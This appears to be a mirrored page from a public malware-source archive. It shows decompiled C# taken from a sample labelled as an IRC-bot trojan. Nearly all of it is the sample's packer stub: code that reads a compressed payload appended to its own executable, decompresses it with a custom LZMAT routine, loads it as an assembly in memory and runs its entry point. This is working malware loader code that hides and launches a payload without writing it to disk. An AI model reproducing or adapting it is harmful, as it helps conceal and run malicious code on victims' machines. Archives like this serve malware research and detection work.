mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 02:46:10 +00:00
240 lines
7.6 KiB
C#
240 lines
7.6 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: insomn._
|
|||
|
// Assembly: insomnia, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: C5640D5E-8EFA-46F3-A304-3D9550F26F27
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan.Win32.Jorik.IRCbot.hhe-79d154a70ce2e7f6c10e5e14d8e4f10e0c920324808f1aaf19d2845df60dcfb1.exe
|
|||
|
|
|||
|
using System;
|
|||
|
using System.IO;
|
|||
|
using System.Reflection;
|
|||
|
using System.Windows.Forms;
|
|||
|
|
|||
|
namespace insomn
|
|||
|
{
|
|||
|
internal class _
|
|||
|
{
|
|||
|
private static Assembly mp;
|
|||
|
|
|||
|
private static unsafe int lzmat(byte[] pOs, byte[] pIs, int cI)
|
|||
|
{
|
|||
|
int index1;
|
|||
|
fixed (byte* numPtr1 = pOs)
|
|||
|
fixed (byte* numPtr2 = pIs)
|
|||
|
{
|
|||
|
numPtr1[0] = numPtr2[4];
|
|||
|
int index2 = 5;
|
|||
|
index1 = 1;
|
|||
|
byte num1 = 0;
|
|||
|
while (index2 < cI - (int) num1)
|
|||
|
{
|
|||
|
byte num2 = numPtr2[index2++];
|
|||
|
if (num1 != (byte) 0)
|
|||
|
num2 = (byte) ((uint) (byte) ((uint) num2 >> 4) + (uint) (byte) ((uint) numPtr2[index2] << 4));
|
|||
|
int num3 = 0;
|
|||
|
while (num3 < 8 && index2 < cI - (int) num1)
|
|||
|
{
|
|||
|
if (((int) num2 & 128) == 128)
|
|||
|
{
|
|||
|
int num4 = *(int*) (numPtr2 + index2);
|
|||
|
if (num1 != (byte) 0)
|
|||
|
num4 >>= 4;
|
|||
|
++index2;
|
|||
|
int num5 = num4 & 1048575;
|
|||
|
int num6;
|
|||
|
if (index1 < 2177)
|
|||
|
{
|
|||
|
int num7 = num5 >> 1;
|
|||
|
if ((num5 & 1) == 1)
|
|||
|
{
|
|||
|
index2 += (int) num1;
|
|||
|
num6 = (num7 & 2047) + 129;
|
|||
|
num1 ^= (byte) 1;
|
|||
|
}
|
|||
|
else
|
|||
|
num6 = (num7 & (int) sbyte.MaxValue) + 1;
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
num6 = num5 >> 2;
|
|||
|
switch (num5 & 3)
|
|||
|
{
|
|||
|
case 0:
|
|||
|
num6 = (num6 & 63) + 1;
|
|||
|
break;
|
|||
|
case 1:
|
|||
|
index2 += (int) num1;
|
|||
|
num6 = (num6 & 1023) + 65;
|
|||
|
num1 ^= (byte) 1;
|
|||
|
break;
|
|||
|
case 2:
|
|||
|
num6 = (num6 & 16383) + 1089;
|
|||
|
++index2;
|
|||
|
break;
|
|||
|
case 3:
|
|||
|
index2 += 1 + (int) num1;
|
|||
|
num6 = (num6 & 262143) + 17473;
|
|||
|
num1 ^= (byte) 1;
|
|||
|
break;
|
|||
|
}
|
|||
|
}
|
|||
|
int num8 = (int) *(ushort*) (numPtr2 + index2);
|
|||
|
int num9;
|
|||
|
if (num1 != (byte) 0)
|
|||
|
{
|
|||
|
num9 = num8 >> 4;
|
|||
|
num1 = (byte) 0;
|
|||
|
++index2;
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
num9 = num8 & 4095;
|
|||
|
num1 = (byte) 1;
|
|||
|
}
|
|||
|
int num10;
|
|||
|
if ((num9 & 15) != 15)
|
|||
|
{
|
|||
|
num10 = (num9 & 15) + 3;
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
++index2;
|
|||
|
if (num9 != 4095)
|
|||
|
{
|
|||
|
num10 = (num9 >> 4) + 18;
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
int num11 = *(int*) (numPtr2 + index2);
|
|||
|
if (num1 != (byte) 0)
|
|||
|
num11 >>= 4;
|
|||
|
int num12 = num11 & (int) ushort.MaxValue;
|
|||
|
index2 += 2;
|
|||
|
if (num12 == (int) ushort.MaxValue)
|
|||
|
{
|
|||
|
int num13;
|
|||
|
if (num1 != (byte) 0)
|
|||
|
{
|
|||
|
num13 = (*(int*) (numPtr2 + index2 - 4) & 252) << 5;
|
|||
|
++index2;
|
|||
|
num1 = (byte) 0;
|
|||
|
}
|
|||
|
else
|
|||
|
num13 = (*(int*) (numPtr2 + index2 - 5) & 4032) << 1;
|
|||
|
int num14 = num13 + (((int) num2 & (int) sbyte.MaxValue) + 4) << 1;
|
|||
|
while (num14-- != 0)
|
|||
|
{
|
|||
|
*(int*) (numPtr1 + index1) = *(int*) (numPtr2 + index2);
|
|||
|
index2 += 4;
|
|||
|
index1 += 4;
|
|||
|
}
|
|||
|
break;
|
|||
|
}
|
|||
|
num10 = num12 + 273;
|
|||
|
}
|
|||
|
}
|
|||
|
int num15 = index1 - num6;
|
|||
|
while (num10-- != 0)
|
|||
|
numPtr1[index1++] = numPtr1[num15++];
|
|||
|
}
|
|||
|
else
|
|||
|
{
|
|||
|
numPtr1[index1] = numPtr2[index2];
|
|||
|
if (num1 != (byte) 0)
|
|||
|
{
|
|||
|
numPtr1[index1] = (byte) ((uint) numPtr1[index1] >> 4);
|
|||
|
byte* numPtr3 = numPtr1 + index1;
|
|||
|
*numPtr3 = (byte) ((uint) *numPtr3 + (uint) (byte) ((uint) numPtr2[index2 + 1] << 4));
|
|||
|
}
|
|||
|
++index1;
|
|||
|
++index2;
|
|||
|
}
|
|||
|
++num3;
|
|||
|
num2 <<= 1;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
return index1;
|
|||
|
}
|
|||
|
|
|||
|
private static bool lz(byte[] c, out byte[] a, int l)
|
|||
|
{
|
|||
|
a = (byte[]) null;
|
|||
|
if (c[4] != (byte) 77 || c[6] != (byte) 90)
|
|||
|
return false;
|
|||
|
byte[] pOs = new byte[8 + (int) c[0] + ((int) c[1] << 8) + ((int) c[2] << 16) + ((int) c[3] << 24)];
|
|||
|
if (_.lzmat(pOs, c, l) == 0)
|
|||
|
return false;
|
|||
|
a = pOs;
|
|||
|
return true;
|
|||
|
}
|
|||
|
|
|||
|
private static bool lf(string fn, out byte[] a)
|
|||
|
{
|
|||
|
FileStream input = new FileStream(fn, FileMode.Open, FileAccess.Read, FileShare.Read);
|
|||
|
int length1 = (int) input.Length;
|
|||
|
input.Seek(60L, SeekOrigin.Begin);
|
|||
|
BinaryReader binaryReader = new BinaryReader((Stream) input);
|
|||
|
int offset1 = binaryReader.ReadInt32();
|
|||
|
if (offset1 >= 2 && offset1 <= length1 - 512)
|
|||
|
{
|
|||
|
input.Seek((long) offset1, SeekOrigin.Begin);
|
|||
|
if (binaryReader.ReadUInt32() == 17744U)
|
|||
|
{
|
|||
|
ushort num1 = binaryReader.ReadUInt16();
|
|||
|
int offset2 = num1 != (ushort) 34404 ? offset1 + 348 : offset1 + 324;
|
|||
|
input.Seek((long) offset2, SeekOrigin.Begin);
|
|||
|
int num2 = binaryReader.ReadInt32();
|
|||
|
int offset3;
|
|||
|
if (num1 == (ushort) 34404)
|
|||
|
{
|
|||
|
int offset4 = offset2 - 12;
|
|||
|
input.Seek((long) offset4, SeekOrigin.Begin);
|
|||
|
offset3 = num2 + binaryReader.ReadInt32();
|
|||
|
}
|
|||
|
else
|
|||
|
offset3 = num2 + 16;
|
|||
|
if (offset3 < length1 && offset3 >= 768)
|
|||
|
{
|
|||
|
int length2 = length1 - offset3;
|
|||
|
byte[] numArray = new byte[length2];
|
|||
|
input.Seek((long) offset3, SeekOrigin.Begin);
|
|||
|
input.Read(numArray, 0, length2);
|
|||
|
input.Close();
|
|||
|
if (_.lz(numArray, out a, length2))
|
|||
|
return true;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
a = (byte[]) null;
|
|||
|
return false;
|
|||
|
}
|
|||
|
|
|||
|
[STAThread]
|
|||
|
private static int Main(string[] args)
|
|||
|
{
|
|||
|
byte[] a;
|
|||
|
if (!_.lf(Application.ExecutablePath, out a))
|
|||
|
{
|
|||
|
int num = (int) MessageBox.Show("File is invalid.", "MPRESS");
|
|||
|
return -1;
|
|||
|
}
|
|||
|
int num1;
|
|||
|
try
|
|||
|
{
|
|||
|
_.mp = Assembly.Load(a);
|
|||
|
MethodInfo entryPoint = _.mp.EntryPoint;
|
|||
|
object[] parameters = (object[]) null;
|
|||
|
if (entryPoint.GetParameters().Length > 0)
|
|||
|
parameters = new object[1]{ (object) args };
|
|||
|
object obj = entryPoint.Invoke((object) null, parameters);
|
|||
|
num1 = obj == null ? 0 : (int) obj;
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
num1 = -1;
|
|||
|
}
|
|||
|
return num1;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|